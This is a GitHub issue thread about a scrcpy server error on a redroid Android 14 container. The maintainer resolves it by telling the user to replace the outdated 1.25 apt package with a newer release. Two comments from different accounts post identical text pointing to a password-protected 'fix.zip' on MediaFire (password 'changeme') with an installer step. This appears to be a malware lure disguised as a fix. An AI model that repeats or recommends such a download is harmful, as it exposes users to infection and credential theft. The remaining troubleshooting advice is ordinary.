### ISSUE TITLE
[server] ERROR: Could not invoke method

### ISSUE THREAD

**Issue by fancy45daddy** [Genymobile/scrcpy#5245]
_Please read the [prerequisites] to run scrcpy._

[prerequisites]: https://github.com/Genymobile/scrcpy#prerequisites

_Also read the [FAQ] and check if your [issue][issues] already exists._

[FAQ]: https://github.com/Genymobile/scrcpy/blob/master/FAQ.md
[issues]: https://github.com/Genymobile/scrcpy/issues

## Environment

 - **OS:** [e.g. Debian, Windows, macOS...] ubuntu
 - **Scrcpy version:** [e.g. 2.5] 1.25
 - **Installation method:** [e.g. manual build, apt, snap, brew, Windows release...] apt
 - **Device model:** Device: redroid redroid14_arm64_only (Android 14)
 - **Android version:** [e.g. 14] 14

## Describe the bug

On errors, please provide the output of the console (and `adb logcat` if relevant).

 ```
I use

sudo podman run -d --privileged -p 5555:5555 --name redroid docker.io/redroid/redroid:14.0.0_64only-latest androidboot.redroid_gpu_mode=guest

to run android

scrcpy 1.25 <https://github.com/Genymobile/scrcpy>
/usr/share/scrcpy/scrcpy-server: 1 file pushed, 0 skipped. 192.1 MB/s (41650 bytes in 0.000s)
[server] INFO: Device: redroid redroid14_arm64_only (Android 14)
[server] ERROR: Could not invoke method
java.lang.NoSuchMethodException: android.content.IClipboard$Stub$Proxy.addPrimaryClipChangedListener [interface android.content.IOnPrimaryClipChangedListener, class java.lang.String, class java.lang.String, int]
	at java.lang.Class.getMethod(Class.java:2937)
	at java.lang.Class.getMethod(Class.java:2449)
	at com.genymobile.scrcpy.wrappers.ClipboardManager.getAddPrimaryClipChangedListener(ClipboardManager.java:128)
	at com.genymobile.scrcpy.wrappers.ClipboardManager.addPrimaryClipChangedListener(ClipboardManager.java:138)
	at com.genymobile.scrcpy.Device.<init>(Device.java:100)
	at com.genymobile.scrcpy.Server.scrcpy(Server.java:64)
	at com.genymobile.scrcpy.Server.main(Server.java:334)
	at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
	at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:359)
INFO: Renderer: opengl
INFO: OpenGL version: 4.6 (Compatibility Profile) Mesa 24.0.9-0ubuntu0.1
INFO: Trilinear filtering enabled
INFO: Initial texture: 720x1280
```

Please do not post screenshots of your terminal, just post the content as text instead.

**Comment by rom1v** [comment]
> scrcpy 1.25 <https://github.com/Genymobile/scrcpy>

1.25 is way too old.

Don't use the official Debian/Ubuntu package, it is obsolete.

https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md#latest-version

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NeUra1l** [comment]
what package we must use, where can I find it. I tried to install scrcpy by the instructions in this link: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md#latest-version but the last csrcpy version was only 1.25. How we must find newer version?

**Comment by NeUra1l** [comment]
> > scrcpy 1.25 https://github.com/Genymobile/scrcpy
> 
> 1.25 is way too old.
> 
> Don't use the official Debian/Ubuntu package, it is obsolete.
> 
> https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md#latest-version

what package we must use, where can I find it. I tried to install scrcpy by the instructions in this link: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md#latest-version but the last csrcpy version was only 1.25. How we must find newer version?

**Comment by rom1v** [comment]
Uninstall the package from your distribution:

```
sudo apt remove scrcpy
```

**Comment by NeUra1l** [comment]
> Uninstall the package from your distribution:
> 
> ```
> sudo apt remove scrcpy
> ```

and where is the newest unofficial version odf scrcpy for ubuntu?

**Comment by rom1v** [comment]
Install with ./install–release.sh: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md#latest-version

**Comment by NeUra1l** [comment]
> Install with ./install–release.sh: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md#latest-version

I installed scrcpy by the instructions in this link but the version of scrcpy didn't changed and still 1.25

**Comment by rom1v** [comment]
Either you have an old repo versikn (`git pull` to updat before executing ./install–release.sh), either you have an old package installed.

What is the result of `which scrcpy`?

**Comment by NeUra1l** [comment]
> Either you have an old repo version (`git pull` to update before executing ./install–release.sh), either you have an old package installed.
> 
> What is the result of `which scrcpy`?

the problem gone without your instructions, i don't know what happened, but know scrcpy version is 2.7
